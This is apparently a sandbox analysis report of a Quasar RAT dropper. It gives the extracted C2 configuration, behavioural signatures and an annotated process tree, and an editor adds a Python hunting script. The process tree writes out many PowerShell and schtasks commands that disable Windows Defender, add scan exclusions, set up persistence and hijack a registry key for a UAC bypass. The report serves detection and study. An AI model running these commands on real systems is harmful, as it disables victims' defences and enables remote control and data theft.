Analysis
  max time kernel    60s
  max time network   160s
  platform           windows10_x64
  resource           win10-en-20211104
  submitted          06-12-2021 06:33

Static task       static1
Behavioral task   behavioral1
  Sample     05603775ae6c66c7207556660da29de4.exe
  Resource   win7-en-20211104

Note: the memory-dump resources further down are named behavioral2/..., and the platform line above says windows10_x64, so the signatures and process tree on this page come from the Windows 10 run, not from the win7 behavioral1 task listed in the tab.
General
  Target   05603775ae6c66c7207556660da29de4.exe
  Size     13.8MB
  MD5      05603775ae6c66c7207556660da29de4
  SHA1     96f1bed1e99e6cd51c4973a8b586f08097009c15
  SHA256   09ac2a0cc0277beb2b85f5d29b4531e65fb1a25e126f89b8a5ad6d0ba04ef369
  SHA512   7aa7620eda7d2a369414abb6d94671a3b8f039d4fce6dabedcc1daba1c0f91468555512dc7827e050b61168a77a4c2f8636eb8ba4a26b399c22a88709d8c5326
Malware Config

Extracted: quasar
  version           2.8.0.1
  tag (botnet)      Driver
  C2                134.255.220.204:4782
  mutex             6IzunZymIRucbMwSQj
  encryption_key    85wBI2y5JEbQcrqb3u8l
  install_name      Driver.exe
  log_directory     Driver
  reconnect_delay   1000 (ms)
  startup_key       Realtek® High Definition Audio Driver
  subdirectory      Realtek® High Definition Audio Driver

The first four rows carry no field names in the extracted page. Version and C2 are evident from their form; "tag" and "mutex" follow the order in which the Quasar config extractor lists its fields and should be read as labels added by the editor, not as extracted text.

The config explains the persistence artifacts seen later in the report: the client is copied to <system dir>\<subdirectory>\<install_name>, which for this 32-bit build resolves to C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe, and both the Run value and the ONLOGON scheduled task are named with startup_key. The ® character in a registry value name, task name and folder name is a usable hunting pivot on its own.
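Turning the extracted config into concrete hunt criteria is the obvious next step, and the mapping has one trap worth encoding: a 32-bit Quasar client writes its install directory under the system directory, which WoW64 redirection turns into SysWOW64 (as this report shows), so a query for System32 alone misses it. The following is an added example written by the editor, not code from the report or from Quasar; the event shape is a simplified Sysmon-like dict and the SAMPLE_EVENTS list is constructed from what this report recorded, with two negative controls.

```python
# Config fields copied from the "Malware Config" section of this report.
QUASAR_CFG = {
    "version": "2.8.0.1",
    "c2": "134.255.220.204:4782",
    "install_name": "Driver.exe",
    "startup_key": "Realtek® High Definition Audio Driver",
    "subdirectory": "Realtek® High Definition Audio Driver",
}


def expected_artifacts(cfg):
    """Artifacts the config predicts on a host. Both System32 and SysWOW64
    spellings of the install path are returned: a 32-bit client (this sample)
    writes to the system directory and WoW64 redirection lands it in SysWOW64,
    as the report's "Drops file in System32 directory" rows show."""
    host, port = cfg["c2"].rsplit(":", 1)
    rel = (cfg["subdirectory"] + "\\" + cfg["install_name"]).lower()
    return {
        "install_paths": {"c:\\windows\\system32\\" + rel, "c:\\windows\\syswow64\\" + rel},
        "run_value_name": cfg["startup_key"].lower(),
        "task_name": cfg["startup_key"].lower(),
        "c2": (host, int(port)),
    }


def match_event(art, ev):
    """Return why an event matches the predicted artifacts, or None.
    Events are flat dicts in a simplified Sysmon-like shape (constructed)."""
    kind = ev["type"]
    if kind == "registry_set":
        # Value name is the last path element; accept Run and RunOnce parents.
        parent, _, name = ev["target"].lower().rpartition("\\")
        if name == art["run_value_name"] and parent.rsplit("\\", 1)[-1] in ("run", "runonce"):
            return "Run/RunOnce value named after startup_key"
    elif kind == "process_create":
        cl = ev["cmdline"].lower()
        if "schtasks" in cl and '/tn "%s"' % art["task_name"] in cl:
            return "scheduled task named after startup_key"
        if any(p in cl for p in art["install_paths"]):
            return "execution of the install path"
    elif kind == "file_create":
        if ev["target"].lower() in art["install_paths"]:
            return "file dropped at the install path"
    elif kind == "network_connect":
        # Port matters: the same host on another port is not the C2 channel.
        if (ev["dst_ip"], ev["dst_port"]) == art["c2"]:
            return "connection to the configured C2"
    return None


def hunt(cfg, events):
    """(event id, reason) for every event that matches the config-derived artifacts."""
    art = expected_artifacts(cfg)
    hits = []
    for ev in events:
        reason = match_event(art, ev)
        if reason:
            hits.append((ev["id"], reason))
    return hits


# Constructed events mirroring what this report recorded, plus two negatives
# (same C2 host on a different port; an unrelated cmd.exe launch).
SAMPLE_EVENTS = [
    {"id": 1, "type": "registry_set",
     "target": r"HKU\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek® High Definition Audio Driver"},
    {"id": 2, "type": "process_create",
     "cmdline": r'"schtasks" /create /tn "Realtek® High Definition Audio Driver" /sc ONLOGON /tr "C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe" /rl HIGHEST /f'},
    {"id": 3, "type": "file_create",
     "target": r"C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe"},
    {"id": 4, "type": "network_connect", "dst_ip": "134.255.220.204", "dst_port": 4782},
    {"id": 5, "type": "network_connect", "dst_ip": "134.255.220.204", "dst_port": 80},
    {"id": 6, "type": "process_create", "cmdline": r'"C:\Windows\System32\cmd.exe" /c compile.bat'},
]

if __name__ == "__main__":
    for hit in hunt(QUASAR_CFG, SAMPLE_EVENTS):
        print(hit)
```

Running it reports events 1 to 4 as hits and leaves 5 and 6 alone. In a real deployment the event dicts would be replaced by whatever the SIEM returns; the comparison is deliberately case-insensitive because the registry and NTFS paths in this report mix cases.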
Signatures

Quasar Payload (4 IoCs)
  resource                                                               yara_rule
  C:\Users\Admin\AppData\Roaming\rat v6.exe                              family_quasar
  C:\Users\Admin\AppData\Roaming\rat v6.exe                              family_quasar
  C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe   family_quasar
  C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe   family_quasar
  "rat v6.exe" (dropped to %APPDATA%) and Driver.exe (its installed copy) are the same Quasar client; the install path matches the subdirectory and install_name fields of the extracted config.

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile (2 alerts)

NirSoft WebBrowserPassView (1 IoC)
  Password recovery tool for various web browsers.
  resource                                                                       yara_rule
  behavioral2/memory/1772-156-0x0000027FF6E50000-0x0000027FF718B000-memory.dmp   WebBrowserPassView

Nirsoft (1 IoC)
  resource                                                                       yara_rule
  behavioral2/memory/1772-156-0x0000027FF6E50000-0x0000027FF718B000-memory.dmp   Nirsoft
  Both rules hit the same memory region of PID 1772, which is RtkBtManServ.exe (dropped and launched by "keylogger py best.exe", see "Executes dropped EXE" below). The file name imitates a Realtek Bluetooth service; what is mapped in memory is the NirSoft browser-password recovery tool, which is consistent with the "Reads user/profile data of web browsers" signature.

Blocklisted process makes network request (2 IoCs)
  process   pid   flow
  cmd.exe   820   24
  cmd.exe   820   26
  cmd.exe (820) is the child of the UPX-packed loader.exe (1376) according to the WriteProcessMemory table below; the loader.exe branch itself is not in the captured part of the process tree.

Downloads MZ/PE file
  (no per-event detail in the extracted report)

Executes dropped EXE (9 IoCs)
  pid    process
  2320   keylogger py best.exe
  1340   rat v6.exe
  1376   loader.exe
  1772   RtkBtManServ.exe
  820    cmd.exe
  888    Driver.exe
  1232   loader.exe
  5044   loader.exe
  3640   loader.exe

(signature title missing from the extracted page; yara rule "upx" matched 4 times)
  resource                                    yara_rule
  C:\Users\Admin\AppData\Roaming\loader.exe   upx
  C:\Users\Admin\AppData\Roaming\loader.exe   upx
  C:\Users\Admin\AppData\Roaming\loader.exe   upx
  C:\Users\Admin\AppData\Roaming\loader.exe   upx

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 3 IoCs)
  description       ioc                                                                                                                                                                                                                           process
  Set value (str)   \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek® High Definition Audio Driver = "\"C:\\Windows\\SysWOW64\\Realtek® High Definition Audio Driver\\Driver.exe\""   Driver.exe
  Key created       \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce                                                                                                                 WScript.exe
  Set value (str)   \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Realtek® High Definition Audio Driver = "C:\\Windows\\SysWOW64\\Realtek® High Definition Audio Driver\\Driver.exe"   WScript.exe
  The Run value is written by the Quasar client itself (startup_key from the config); the RunOnce value is written by WScript.exe, i.e. by one of the Execution*.vbs scripts in the process tree, so the client is registered twice in addition to the scheduled task.

Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow   ioc
  20     ip-api.com

Drops file in System32 directory (4 IoCs)
  description                    ioc                                                                    process
  File opened for modification   C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe   Driver.exe
  File opened for modification   C:\Windows\SysWOW64\Realtek® High Definition Audio Driver              Driver.exe
  File created                   C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe   rat v6.exe
  File opened for modification   C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe   rat v6.exe
  The signature says "System32" but the recorded path is SysWOW64: the 32-bit client targets the system directory and WoW64 file-system redirection places it under SysWOW64. Hunt for both spellings.

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid    process
  1376   loader.exe
  3640   loader.exe
  ThreadHideFromDebugger detaches the calling thread from an attached debugger; it is an anti-analysis measure and fits loader.exe being the UPX-packed component.

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). The sandbox attaches its stock "likely ransomware behaviour" note to this event; for a Quasar sample, drive enumeration is at least as consistent with the RAT's file-manager feature, and nothing else in this report (no mass file modification, no ransom note) points to ransomware.

Creates scheduled task(s) (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid    process
  3968   schtasks.exe
  4108   schtasks.exe
  Both invocations create the same ONLOGON task "Realtek® High Definition Audio Driver" with /rl HIGHEST (see the process tree); the task name is the config's startup_key.

Modifies registry class (8 IoCs)
  description       ioc                                                                                                    process
  Key created       \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell                  rat v6.exe
  Key created       \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open             rat v6.exe
  Set value (str)   \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\    rat v6.exe
  Key created       \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings                     Driver.exe
  Key created       \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings                     explorer.exe
  Key created       \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings                     RtkBtManServ.exe
  Key created       \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command     rat v6.exe
  Key created       \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings                        rat v6.exe
  The ms-settings\shell\open\command key under the user's Classes hive (the trailing backslash on the "Set value" row denotes its default value) is the handler hijacked by fodhelper.exe-style UAC bypasses. The report records rat v6.exe creating the key and setting the value, but no fodhelper.exe launch appears in the captured process tree, so treat it as intent rather than a confirmed elevation. The "Local Settings" rows are routine shell-cache keys.

(signature title missing from the extracted page; certificate-store keys written by loader.exe, 6 IoCs)
  description        ioc                                                                                                  process
  Key created        \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys                                       loader.exe
  Key created        \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys\2B45B1179163F067ED8504BEEA8A807724D51262   loader.exe
  Set value (data)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys\2B45B1179163F067ED8504BEEA8A807724D51262\Blob = 02000000000000006c0000001c000000000000000100000020000000000000000000000002000000650031003200360031003000300064002d0063003600610033002d0034003300340030002d0039003500320062002d0034003600650032006600320064006500650066003700650000000000000000002300000000000000140000002b45b1179163f067ed8504beea8a807724d51262   loader.exe
  Key created        \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys                                       loader.exe
  Key created        \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys\62BBA703D900E2753BD0BDCB3DD18812B85D002B   loader.exe
  Set value (data)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys\62BBA703D900E2753BD0BDCB3DD18812B85D002B\Blob = 02000000000000006c0000001c000000000000000100000020000000000000000000000002000000620066003100320038003700380033002d0066003800630064002d0034003900660032002d0061006500370038002d00630030006200320032006300630062006200620062006200000000000000000023000000000000001400000062bba703d900e2753bd0bdcb3dd18812b85d002b   loader.exe
  These are entries under the machine "MY" certificate store's Keys subkey; each Blob embeds a UTF-16 GUID-style name and ends with the same 20-byte hash used as the subkey name. The report does not show what loader.exe did with the key material.

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  The report caps this list at 64 rows; distinct entries are:
  pid    process
  1376   loader.exe       (repeated)
  3160   Conhost.exe
  1688   powershell.exe
  1404   cmd.exe
  344    powershell.exe
  3692   Conhost.exe
  1644   powershell.exe
  4184   powershell.exe
  888    Driver.exe       (repeated; the majority of the capped rows)
  4624   Conhost.exe

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid    process
  1340   rat v6.exe

Suspicious use of AdjustPrivilegeToken (38 IoCs)
  pid    process            tokens
  1340   rat v6.exe         SeDebugPrivilege, SeBackupPrivilege, SeSecurityPrivilege (27 rows, the latter two alternating)
  1772   RtkBtManServ.exe   SeDebugPrivilege
  888    Driver.exe         SeDebugPrivilege (2 rows)
  3160   Conhost.exe        SeDebugPrivilege
  1688   powershell.exe     SeDebugPrivilege
  1404   cmd.exe            SeDebugPrivilege
  344    powershell.exe     SeDebugPrivilege
  3692   Conhost.exe        SeDebugPrivilege
  1644   powershell.exe     SeDebugPrivilege
  4184   powershell.exe     SeDebugPrivilege
  4624   Conhost.exe        SeDebugPrivilege

Suspicious use of SetWindowsHookEx (3 IoCs)
  pid    process
  1376   loader.exe
  888    Driver.exe
  3640   loader.exe
  A hook installed through SetWindowsHookEx is consistent with Quasar's keylogger, which captures input through a low-level keyboard hook; Driver.exe is the installed Quasar client.

Suspicious use of WriteProcessMemory (64 IoCs)
  The report lists one row per write and caps the list at 64; collapsed here to distinct source -> target pairs. Every pair is a parent writing into a child it has just launched, which is the ordinary CreateProcess pattern this signature also fires on; none of the rows shows a write into an unrelated process, so this is not evidence of injection.
  source pid   source process                          target pid                                                                  target process
  2532         05603775ae6c66c7207556660da29de4.exe    2320                                                                        keylogger py best.exe
  2532         05603775ae6c66c7207556660da29de4.exe    1340                                                                        rat v6.exe
  2532         05603775ae6c66c7207556660da29de4.exe    1376                                                                        loader.exe
  2320         keylogger py best.exe                   1772                                                                        RtkBtManServ.exe
  1340         rat v6.exe                              3968                                                                        schtasks.exe
  1376         loader.exe                              820                                                                         cmd.exe
  1340         rat v6.exe                              888                                                                         Driver.exe
  1340         rat v6.exe                              3288, 3556, 1200, 1808, 3596, 1564, 3656, 1260, 3356, 956, 1572, 2892       cmd.exe
  3288         cmd.exe                                 3160                                                                        Conhost.exe
  1200         cmd.exe                                 1688                                                                        powershell.exe
  1808         cmd.exe                                 1404                                                                        cmd.exe
  3556         cmd.exe                                 344                                                                         powershell.exe

System policy modification (1 TTPs, 4 IoCs)
  description       ioc                                                                                                         process
  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\dontdisplaylastusername = "1"   rat v6.exe
  Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters               rat v6.exe
  Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System                                  rat v6.exe
  Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP                          rat v6.exe
  dontdisplaylastusername = 1 is the "do not display last user name" logon policy. Together with the Defender exclusions and firewall rules for "RDP Wrapper", winvnc.exe and ngrok.exe in the process tree, it points to rat v6.exe staging hidden remote-desktop access alongside Quasar. Only the creation of CredSSP\Parameters is recorded, not any value written under it, and none of the excluded Venom\*.exe files is seen being dropped or executed within the captured run.
Processes

Depth in the tree is given in brackets. Each entry shows the image path as loaded and, on the next line, the command line as captured. Where the two differ (C:\Windows\SysWOW64\... as image against "C:\Windows\System32\..." in the command line) it is WoW64 file-system redirection for a 32-bit parent, not a second copy of the binary. PIDs are added only where the signature tables above make the mapping unambiguous.

[1] C:\Users\Admin\AppData\Local\Temp\05603775ae6c66c7207556660da29de4.exe (PID 2532)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\05603775ae6c66c7207556660da29de4.exe"
    - Suspicious use of WriteProcessMemory

  [2] C:\Users\Admin\AppData\Roaming\keylogger py best.exe (PID 2320)
      cmdline: "C:\Users\Admin\AppData\Roaming\keylogger py best.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

    [3] C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe (PID 1772)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4gbUNbdjDVoEzuwe9QI1beMhUDwpgbq9t8eYqac7ixuzdX2esxhonYoBWN9FbGupbkub/9oCF5YryYcksMtSymyriBd/PbXKARudWjYmyujJNq14nt3KQdYmw2VrgARL8=
        - Executes dropped EXE
        - Modifies registry class
        - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\System32\WScript.exe
          cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"

        [5] C:\Windows\System32\cmd.exe
            cmdline: "C:\Windows\System32\cmd.exe" /c compile.bat

      [4] C:\Windows\System32\WScript.exe
          cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"

        [5] C:\Windows\System32\cmd.exe
            cmdline: "C:\Windows\System32\cmd.exe" /c compile.bat

          [6] C:\Windows\System32\Conhost.exe
              cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

  [2] C:\Users\Admin\AppData\Roaming\rat v6.exe (PID 1340)
      cmdline: "C:\Users\Admin\AppData\Roaming\rat v6.exe"
      - Executes dropped EXE
      - Drops file in System32 directory
      - Modifies registry class
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - System policy modification

    [3] C:\Windows\SysWOW64\schtasks.exe (PID 3968)
        cmdline: "schtasks" /create /tn "Realtek® High Definition Audio Driver" /sc ONLOGON /tr "C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe" /rl HIGHEST /f
        - Creates scheduled task(s)

    [3] C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe (PID 888)
        cmdline: "C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe"
        - Executes dropped EXE
        - Adds Run key to start application
        - Drops file in System32 directory
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx

      [4] C:\Windows\SysWOW64\schtasks.exe (PID 4108)
          cmdline: "schtasks" /create /tn "Realtek® High Definition Audio Driver" /sc ONLOGON /tr "C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe" /rl HIGHEST /f
          - Creates scheduled task(s)

      [4] C:\Windows\SysWOW64\explorer.exe
          cmdline: "C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Local\Execution.vbs

      [4] C:\Windows\SysWOW64\WScript.exe
          cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution2.vbs"

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
          (the stray space in "/ t" is in the captured command line; reg.exe does not accept it as the /t switch, so this particular write most likely failed)

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

        [5] C:\Windows\System32\Conhost.exe
            cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

        [5] C:\Windows\System32\Conhost.exe
            cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

        [5] C:\Windows\System32\Conhost.exe
            cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

      [4] C:\Windows\SysWOW64\WScript.exe
          cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution5.vbs"

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming & exit
        - Suspicious use of WriteProcessMemory

